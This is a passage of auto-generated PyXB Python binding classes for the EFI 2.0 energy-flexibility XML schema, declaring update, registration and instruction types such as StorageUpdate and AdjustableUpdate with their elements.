# Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
__supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_22_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 220, 6), )
supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__supportedCommodities.name() : __supportedCommodities
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_22 = CTD_ANON_22
# Complex type {http://www.flexiblepower.org/efi-2}InflexibleUpdate with content type ELEMENT_ONLY
class InflexibleUpdate (FlexibilityUpdate):
"""Complex type {http://www.flexiblepower.org/efi-2}InflexibleUpdate with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'InflexibleUpdate')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 247, 1)
_ElementMap = FlexibilityUpdate._ElementMap.copy()
_AttributeMap = FlexibilityUpdate._AttributeMap.copy()
# Base type is FlexibilityUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.InflexibleUpdate = InflexibleUpdate
Namespace.addCategoryObject('typeBinding', 'InflexibleUpdate', InflexibleUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_23 (Instruction):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 319, 2)
_ElementMap = Instruction._ElementMap.copy()
_AttributeMap = Instruction._AttributeMap.copy()
# Base type is Instruction
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element {http://www.flexiblepower.org/efi-2}curtailmentProfile uses Python identifier curtailmentProfile
__curtailmentProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfile'), 'curtailmentProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_23_httpwww_flexiblepower_orgefi_2curtailmentProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 323, 6), )
curtailmentProfile = property(__curtailmentProfile.value, __curtailmentProfile.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__curtailmentProfile.name() : __curtailmentProfile
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_23 = CTD_ANON_23
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_24 (FlexibilityRegistration):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 341, 2)
_ElementMap = FlexibilityRegistration._ElementMap.copy()
_AttributeMap = FlexibilityRegistration._AttributeMap.copy()
# Base type is FlexibilityRegistration
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
__supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_24_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 345, 6), )
supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__supportedCommodities.name() : __supportedCommodities
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_24 = CTD_ANON_24
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_25 (FlexibilityUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 376, 2)
_ElementMap = FlexibilityUpdate._ElementMap.copy()
_AttributeMap = FlexibilityUpdate._AttributeMap.copy()
# Base type is FlexibilityUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}endBefore uses Python identifier endBefore
__endBefore = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'endBefore'), 'endBefore', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_25_httpwww_flexiblepower_orgefi_2endBefore', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 380, 6), )
endBefore = property(__endBefore.value, __endBefore.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}sequentialProfiles uses Python identifier sequentialProfiles
__sequentialProfiles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfiles'), 'sequentialProfiles', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_25_httpwww_flexiblepower_orgefi_2sequentialProfiles', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 381, 6), )
sequentialProfiles = property(__sequentialProfiles.value, __sequentialProfiles.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__endBefore.name() : __endBefore,
__sequentialProfiles.name() : __sequentialProfiles
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_25 = CTD_ANON_25
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_26 (Instruction):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 400, 2)
_ElementMap = Instruction._ElementMap.copy()
_AttributeMap = Instruction._AttributeMap.copy()
# Base type is Instruction
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element {http://www.flexiblepower.org/efi-2}sequentialProfileInstructions uses Python identifier sequentialProfileInstructions
__sequentialProfileInstructions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstructions'), 'sequentialProfileInstructions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_26_httpwww_flexiblepower_orgefi_2sequentialProfileInstructions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 404, 6), )
sequentialProfileInstructions = property(__sequentialProfileInstructions.value, __sequentialProfileInstructions.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__sequentialProfileInstructions.name() : __sequentialProfileInstructions
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_26 = CTD_ANON_26
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_27 (FlexibilityRegistration):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 411, 2)
_ElementMap = FlexibilityRegistration._ElementMap.copy()
_AttributeMap = FlexibilityRegistration._AttributeMap.copy()
# Base type is FlexibilityRegistration
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element {http://www.flexiblepower.org/efi-2}fillLevelLabel uses Python identifier fillLevelLabel
__fillLevelLabel = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLabel'), 'fillLevelLabel', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2fillLevelLabel', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 415, 6), )
fillLevelLabel = property(__fillLevelLabel.value, __fillLevelLabel.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}fillLevelUnit uses Python identifier fillLevelUnit
__fillLevelUnit = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUnit'), 'fillLevelUnit', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2fillLevelUnit', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 416, 6), )
fillLevelUnit = property(__fillLevelUnit.value, __fillLevelUnit.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}actuators uses Python identifier actuators
__actuators = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuators'), 'actuators', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_27_httpwww_flexiblepower_orgefi_2actuators', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 417, 6), )
actuators = property(__actuators.value, __actuators.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__fillLevelLabel.name() : __fillLevelLabel,
__fillLevelUnit.name() : __fillLevelUnit,
__actuators.name() : __actuators
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_27 = CTD_ANON_27
# Complex type {http://www.flexiblepower.org/efi-2}StorageUpdate with content type ELEMENT_ONLY
class StorageUpdate (FlexibilityUpdate):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageUpdate with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUpdate')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 692, 1)
_ElementMap = FlexibilityUpdate._ElementMap.copy()
_AttributeMap = FlexibilityUpdate._AttributeMap.copy()
# Base type is FlexibilityUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.StorageUpdate = StorageUpdate
Namespace.addCategoryObject('typeBinding', 'StorageUpdate', StorageUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_28 (Instruction):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 803, 2)
_ElementMap = Instruction._ElementMap.copy()
_AttributeMap = Instruction._AttributeMap.copy()
# Base type is Instruction
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element {http://www.flexiblepower.org/efi-2}actuatorInstructions uses Python identifier actuatorInstructions
__actuatorInstructions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstructions'), 'actuatorInstructions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_28_httpwww_flexiblepower_orgefi_2actuatorInstructions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 807, 6), )
actuatorInstructions = property(__actuatorInstructions.value, __actuatorInstructions.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__actuatorInstructions.name() : __actuatorInstructions
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_28 = CTD_ANON_28
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_29 (FlexibilityRegistration):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 814, 2)
_ElementMap = FlexibilityRegistration._ElementMap.copy()
_AttributeMap = FlexibilityRegistration._AttributeMap.copy()
# Base type is FlexibilityRegistration
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
__supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_29_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6), )
supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__supportedCommodities.name() : __supportedCommodities
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_29 = CTD_ANON_29
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableUpdate with content type ELEMENT_ONLY
class AdjustableUpdate (FlexibilityUpdate):
"""Complex type {http://www.flexiblepower.org/efi-2}AdjustableUpdate with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableUpdate')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 891, 1)
_ElementMap = FlexibilityUpdate._ElementMap.copy()
_AttributeMap = FlexibilityUpdate._AttributeMap.copy()
# Base type is FlexibilityUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.AdjustableUpdate = AdjustableUpdate
Namespace.addCategoryObject('typeBinding', 'AdjustableUpdate', AdjustableUpdate)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_30 (Instruction):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 919, 2)
_ElementMap = Instruction._ElementMap.copy()
_AttributeMap = Instruction._AttributeMap.copy()
# Base type is Instruction
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionId ({http://www.flexiblepower.org/efi-2}instructionId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element isEmergencyInstruction ({http://www.flexiblepower.org/efi-2}isEmergencyInstruction) inherited from {http://www.flexiblepower.org/efi-2}Instruction
# Element {http://www.flexiblepower.org/efi-2}runningModeId uses Python identifier runningModeId
__runningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), 'runningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2runningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6), )
runningModeId = property(__runningModeId.value, __runningModeId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
__runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6), )
runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
__startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_30_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6), )
startTime = property(__startTime.value, __startTime.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__runningModeId.name() : __runningModeId,
__runningModeFactor.name() : __runningModeFactor,
__startTime.name() : __startTime
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_30 = CTD_ANON_30
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_31 (InflexibleUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 281, 2)
_ElementMap = InflexibleUpdate._ElementMap.copy()
_AttributeMap = InflexibleUpdate._AttributeMap.copy()
# Base type is InflexibleUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}forecastProfiles uses Python identifier forecastProfiles
__forecastProfiles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'forecastProfiles'), 'forecastProfiles', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_31_httpwww_flexiblepower_orgefi_2forecastProfiles', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 285, 6), )
forecastProfiles = property(__forecastProfiles.value, __forecastProfiles.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__forecastProfiles.name() : __forecastProfiles
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_31 = CTD_ANON_31
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_32 (InflexibleUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 308, 2)
_ElementMap = InflexibleUpdate._ElementMap.copy()
_AttributeMap = InflexibleUpdate._AttributeMap.copy()
# Base type is InflexibleUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}curtailmentOptions uses Python identifier curtailmentOptions
__curtailmentOptions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions'), 'curtailmentOptions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_32_httpwww_flexiblepower_orgefi_2curtailmentOptions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6), )
curtailmentOptions = property(__curtailmentOptions.value, __curtailmentOptions.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__curtailmentOptions.name() : __curtailmentOptions
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_32 = CTD_ANON_32
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_33 (StorageUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 681, 2)
_ElementMap = StorageUpdate._ElementMap.copy()
_AttributeMap = StorageUpdate._AttributeMap.copy()
# Base type is StorageUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}actuatorBehaviours uses Python identifier actuatorBehaviours
__actuatorBehaviours = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours'), 'actuatorBehaviours', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_33_httpwww_flexiblepower_orgefi_2actuatorBehaviours', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6), )
actuatorBehaviours = property(__actuatorBehaviours.value, __actuatorBehaviours.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}leakageBehaviour uses Python identifier leakageBehaviour
__leakageBehaviour = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour'), 'leakageBehaviour', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_33_httpwww_flexiblepower_orgefi_2leakageBehaviour', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6), )
leakageBehaviour = property(__leakageBehaviour.value, __leakageBehaviour.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__actuatorBehaviours.name() : __actuatorBehaviours,
__leakageBehaviour.name() : __leakageBehaviour
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_33 = CTD_ANON_33
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_34 (StorageUpdate):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 731, 2)
_ElementMap = StorageUpdate._ElementMap.copy()
_AttributeMap = StorageUpdate._AttributeMap.copy()
# Base type is StorageUpdate
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
# Element {http://www.flexiblepower.org/efi-2}currentFillLevel uses Python identifier currentFillLevel
__currentFillLevel = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel'), 'currentFillLevel', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_34_httpwww_flexiblepower_orgefi_2currentFillLevel', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6), )
currentFillLevel = property(__currentFillLevel.value, __currentFillLevel.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}actuatorStatuses uses Python identifier actuatorStatuses
